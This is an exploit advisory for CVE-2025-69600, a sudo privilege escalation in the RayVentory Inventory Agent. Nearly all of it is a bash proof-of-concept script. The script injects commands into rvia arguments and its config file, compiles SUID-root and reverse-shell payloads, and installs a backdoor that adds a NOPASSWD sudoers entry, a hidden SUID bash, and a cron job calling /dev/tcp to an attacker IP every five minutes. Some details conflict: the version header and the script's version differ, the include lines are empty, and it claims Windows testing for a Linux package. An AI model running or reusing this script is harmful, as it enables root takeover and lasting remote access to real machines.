============================================================================================================================================= | # Title : Raynet rvia 2.6.4392.49-amd64.deb Privilege Escalation Vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) | | # Vendor : https://raynet.de/ | ============================================================================================================================================= [+] Summary : A privilege escalation vulnerability identified as CVE-2025-69600 affects certain versions of RayVentory Inventory Agent. The issue arises from improper validation and insufficient restriction of privileged operations when executed through sudo configurations. Under specific misconfigurations, a local authenticated user may be able to execute unintended commands with elevated privileges. Successful exploitation could lead to full system compromise, including unauthorized modification of system files and persistence mechanisms. Organizations using affected versions should review sudo configurations, restrict command execution scopes, and upgrade to a patched version as recommended by the vendor [+] POC : #!/bin/bash RED='\033[0;31m' GREEN='\033[0;32m' YELLOW='\033[1;33m' BLUE='\033[0;34m' NC='\033[0m' VULNERABLE_VERSION="12.6.4392.49" TARGET_DIR="/tmp" PAYLOAD_NAME="rootme_$$" # Added PID to avoid conflict BACKUP_DIR="/tmp/.rvia_backup_$$" LISTENER_PORT="4444" CVE_NUMBER="CVE-2025-69600" REVERSE_IP="" REVERSE_PORT="4444" LISTENER_PID="" CLEANUP_NEEDED=false EXPLOIT_SUCCESS=false show_help() { cat << EOF Exploit for $CVE_NUMBER - RayVentory Inventory Agent Optimized Version 3.0 Usage: $0 [options] Options: -c, --check Only check for vulnerability -e, --exploit Attempt local exploitation -r, --reverse IP Reverse Shell (Example: -r 192.168.1.100) -p, --port PORT Port (Default: 4444) -b, --backdoor IP Install persistent backdoor -h, --help Show help Examples: $0 -c $0 -e $0 -r 192.168.1.100 -p 5555 $0 -b 192.168.1.100 EOF exit 0 } cleanup() { if [ "$CLEANUP_NEEDED" = true ]; then echo -e "\n${YELLOW}[*] Cleaning up temporary files...${NC}" rm -f "/tmp/$PAYLOAD_NAME" 2>/dev/null rm -f "/tmp/$PAYLOAD_NAME.c" 2>/dev/null rm -f "/tmp/malicious_$$.cfg" 2>/dev/null if [ -d "/tmp/bin_$$" ]; then rm -rf "/tmp/bin_$$" 2>/dev/null fi if [ -f "$BACKUP_DIR/rvia.cfg" ]; then if [ -f "/opt/rvia/rvia.cfg" ]; then cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null fi rm -rf "$BACKUP_DIR" 2>/dev/null echo -e "${GREEN}[OK] Configuration file restored${NC}" fi if [ -n "$LISTENER_PID" ] && kill -0 "$LISTENER_PID" 2>/dev/null; then kill "$LISTENER_PID" 2>/dev/null sleep 1 kill -9 "$LISTENER_PID" 2>/dev/null fi echo -e "${GREEN}[OK] Cleanup complete${NC}" fi exit 0 } trap cleanup SIGINT SIGTERM EXIT create_payload() { local payload_type=$1 local payload_path="/tmp/${PAYLOAD_NAME}.c" local gcc_output echo -e "${BLUE}[*] Creating payload: $payload_type${NC}" case $payload_type in "suid") cat > "$payload_path" << 'EOF' #include #include #include int main() { if (setuid(0) != 0) { return 1; } if (setgid(0) != 0) { return 1; } execl("/bin/bash", "bash", "-p", NULL); return 0; } EOF ;; "reverse") if [ -z "$REVERSE_IP" ]; then echo -e "${RED}[!] Reverse shell IP not specified${NC}" return 1 fi cat > "$payload_path" << EOF #include #include #include #include #include #include int main() { int sock; struct sockaddr_in server; sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) return 1; server.sin_family = AF_INET; server.sin_port = htons($REVERSE_PORT); server.sin_addr.s_addr = inet_addr("$REVERSE_IP"); if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) { close(sock); return 1; } dup2(sock, 0); dup2(sock, 1); dup2(sock, 2); execl("/bin/bash", "bash", NULL); return 0; } EOF ;; "backdoor") if [ -z "$REVERSE_IP" ]; then echo -e "${RED}[!] Backdoor IP not specified${NC}" return 1 fi cat > "$payload_path" << EOF #include #include #include #include int main() { while(1) { if (getuid() == 0) { FILE *fp; fp = fopen("/etc/sudoers", "a"); if (fp) { fprintf(fp, "\\nroot ALL=(ALL:ALL) NOPASSWD:ALL\\n"); fclose(fp); } system("cp /bin/bash /tmp/.hidden_bash && chmod 4755 /tmp/.hidden_bash"); system("echo '*/5 * * * * root /tmp/.hidden_bash -c \"bash -i >& /dev/tcp/$REVERSE_IP/$REVERSE_PORT 0>&1\"' >> /etc/crontab"); break; } sleep(5); } return 0; } EOF ;; *) echo -e "${RED}[!] Unknown payload type: $payload_type${NC}" return 1 ;; esac if ! command -v gcc &> /dev/null; then echo -e "${RED}[!] gcc is not installed${NC}" return 1 fi gcc_output=$(gcc -Wall "$payload_path" -o "/tmp/$PAYLOAD_NAME" 2>&1) if [ $? -ne 0 ]; then echo -e "${RED}[!] Failed to compile payload${NC}" echo -e "${RED}$gcc_output${NC}" return 1 fi chmod +x "/tmp/$PAYLOAD_NAME" echo -e "${GREEN}[OK] Payload created successfully: /tmp/$PAYLOAD_NAME${NC}" CLEANUP_NEEDED=true return 0 } check_version() { echo -e "${BLUE}[*] Checking RayVentory version...${NC}" local version="" local installed=false if command -v dpkg &> /dev/null; then version=$(dpkg -l 2>/dev/null | grep rvia | awk '{print $3}') if [ -n "$version" ]; then installed=true fi fi if [ "$installed" = false ] && [ -f "/opt/rvia/rvia" ]; then version=$(/opt/rvia/rvia --version 2>/dev/null | head -n1 | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+') if [ -n "$version" ]; then installed=true fi fi if [ "$installed" = false ]; then echo -e "${RED}[!] RayVentory is not installed on the system${NC}" return 1 fi echo -e "${GREEN}[OK] Installed version: $version${NC}" if command -v dpkg &> /dev/null; then if dpkg --compare-versions "$version" le "$VULNERABLE_VERSION" 2>/dev/null; then echo -e "${GREEN}[OK] System is vulnerable to $CVE_NUMBER${NC}" return 0 else echo -e "${RED}[!] Version $version is newer than the known vulnerable version${NC}" echo -e "${YELLOW}[!] System might not be vulnerable${NC}" return 1 fi else echo -e "${YELLOW}[!] Cannot accurately verify vulnerability status${NC}" echo -e "${YELLOW}[!] Proceeding with exploitation attempt at your own risk${NC}" return 0 fi } check_sudo() { echo -e "${BLUE}[*] Checking sudo privileges...${NC}" if ! command -v sudo &> /dev/null; then echo -e "${RED}[!] sudo is not installed${NC}" return 1 fi if ! sudo -n true 2>/dev/null; then echo -e "${YELLOW}[!] sudo may require a password${NC}" echo -e "${YELLOW}[*] Please enter password if prompted${NC}" fi local sudo_config=$(sudo -l 2>&1) if echo "$sudo_config" | grep -q "sorry, a password is required"; then echo -e "${RED}[!] sudo password required but not provided${NC}" return 1 fi if ! echo "$sudo_config" | grep -q "rvia"; then echo -e "${RED}[!] No sudo privileges found for rvia${NC}" return 1 fi echo -e "${GREEN}[OK] sudo privileges exist${NC}" local patterns=( "rvia[[:space:]]*\*" "rvia[[:space:]]+getconfig" "rvia[[:space:]]+upload" "rvia[[:space:]]+inventory" "rvia[[:space:]]+oracle" "(root)[[:space:]]*" "(ALL[[:space:]]*:[[:space:]]*ALL)" "(ALL)[[:space:]]*" ) local found=0 for pattern in "${patterns[@]}"; do if echo "$sudo_config" | grep -qE "$pattern"; then found=1 echo -e "${GREEN}[OK] Found exploitable pattern: $pattern${NC}" break fi done if [ $found -eq 1 ]; then echo -e "${GREEN}[OK] Configuration is exploitable!${NC}" return 0 else echo -e "${YELLOW}[!] Configuration may not be directly exploitable${NC}" return 0 fi } exploit_single_method() { local method=$1 local cmd="/tmp/$PAYLOAD_NAME" local temp_cfg="/tmp/malicious_$$.cfg" echo -e "${BLUE}[*] Attempting exploit using: $method${NC}" if [ ! -d "$BACKUP_DIR" ] && [ -f "/opt/rvia/rvia.cfg" ]; then mkdir -p "$BACKUP_DIR" cp "/opt/rvia/rvia.cfg" "$BACKUP_DIR/" 2>/dev/null fi case $method in "getconfig") sudo /opt/rvia/rvia getconfig \";$cmd;\" 2>/dev/null ;; "upload") mkdir -p "/opt/rvia/results" 2>/dev/null touch "/opt/rvia/results/test_$$.xml" 2>/dev/null sudo /opt/rvia/rvia upload \"\;$cmd\;#\" 2>/dev/null ;; "inventory") sudo /opt/rvia/rvia inventory \";$cmd;\" 2>/dev/null ;; "oracle") local bin_dir="/tmp/bin_$$" mkdir -p "$bin_dir" 2>/dev/null ln -sf "/tmp/$PAYLOAD_NAME" "$bin_dir/java" 2>/dev/null cat > "$temp_cfg" << EOF javaPaths=$bin_dir/ EOF cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null sudo /opt/rvia/rvia oracle test 2>/dev/null ;; "config") cat > "$temp_cfg" << EOF configDownloadSource=http://127.0.0.1:$LISTENER_PORT/malicious schedule:command:$cmd * * * * * EOF cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null ( timeout 5 nc -l -p "$LISTENER_PORT" -q 1 2>/dev/null << EOF HTTP/1.1 200 OK Content-Type: text/plain malicious EOF ) & LISTENER_PID=$! sleep 2 sudo /opt/rvia/rvia getconfig 2>/dev/null ;; esac sleep 3 } check_success() { local payload="/tmp/$PAYLOAD_NAME" if [ ! -f "$payload" ]; then return 1 fi if [ -u "$payload" ]; then echo -e "${GREEN}[OK] Privilege escalation successful!${NC}" echo -e "${GREEN}[OK] Launching root shell...${NC}" EXPLOIT_SUCCESS=true "$payload" return 0 fi if command -v stat &> /dev/null; then local perms=$(stat -c "%A" "$payload" 2>/dev/null) if [[ $perms == *s* ]]; then echo -e "${GREEN}[OK] Privilege escalation successful (stat)!${NC}" EXPLOIT_SUCCESS=true "$payload" return 0 fi fi return 1 } try_all_methods() { local methods=("getconfig" "upload" "inventory" "oracle" "config") local success=1 for method in "${methods[@]}"; do exploit_single_method "$method" if check_success; then success=0 break fi # Restore configuration file after each failed attempt if [ -f "$BACKUP_DIR/rvia.cfg" ]; then cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null fi done return $success } install_backdoor() { echo -e "${BLUE}[*] Installing persistent backdoor...${NC}" if [ -z "$REVERSE_IP" ]; then echo -e "${RED}[!] Backdoor IP must be specified${NC}" return 1 fi if create_payload "backdoor"; then if try_all_methods; then echo -e "${GREEN}[OK] Backdoor installed successfully${NC}" echo -e "${YELLOW}[*] Reverse shell to $REVERSE_IP:$REVERSE_PORT every 5 minutes${NC}" return 0 else echo -e "${RED}[!] Failed to install backdoor${NC}" return 1 fi fi } main() { local CHECK_ONLY=false local EXPLOIT=false local BACKDOOR=false local REVERSE=false while [[ $# -gt 0 ]]; do case $1 in -c|--check) CHECK_ONLY=true shift ;; -e|--exploit) EXPLOIT=true shift ;; -r|--reverse) REVERSE=true if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then echo -e "${RED}[!] IP required for reverse shell${NC}" exit 1 fi REVERSE_IP="$2" shift 2 ;; -p|--port) if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then echo -e "${RED}[!] Port number required${NC}" exit 1 fi if ! [[ "$2" =~ ^[0-9]+$ ]] || [ "$2" -lt 1 ] || [ "$2" -gt 65535 ]; then echo -e "${RED}[!] Invalid port: $2${NC}" exit 1 fi REVERSE_PORT="$2" shift 2 ;; -b|--backdoor) BACKDOOR=true if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then echo -e "${RED}[!] IP required for backdoor${NC}" exit 1 fi REVERSE_IP="$2" shift 2 ;; -h|--help) show_help ;; *) echo -e "${RED}Unknown option: $1${NC}" show_help ;; esac done if [ ! -f "/opt/rvia/rvia" ]; then echo -e "${RED}[!] RayVentory is not installed at /opt/rvia/rvia${NC}" exit 1 fi if [ "$CHECK_ONLY" = true ]; then check_version && check_sudo exit $? fi if [ "$BACKDOOR" = true ]; then check_version && check_sudo && install_backdoor exit $? fi if [ "$REVERSE" = true ]; then check_version && check_sudo && create_payload "reverse" && try_all_methods if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then echo -e "${RED}[!] Exploit failed${NC}" exit 1 fi exit 0 fi if [ "$EXPLOIT" = true ]; then check_version && check_sudo && create_payload "suid" && try_all_methods if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then echo -e "${RED}[!] Exploit failed${NC}" exit 1 fi exit 0 fi show_help } main "$@" Greetings to :====================================================================== jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)| ====================================================================================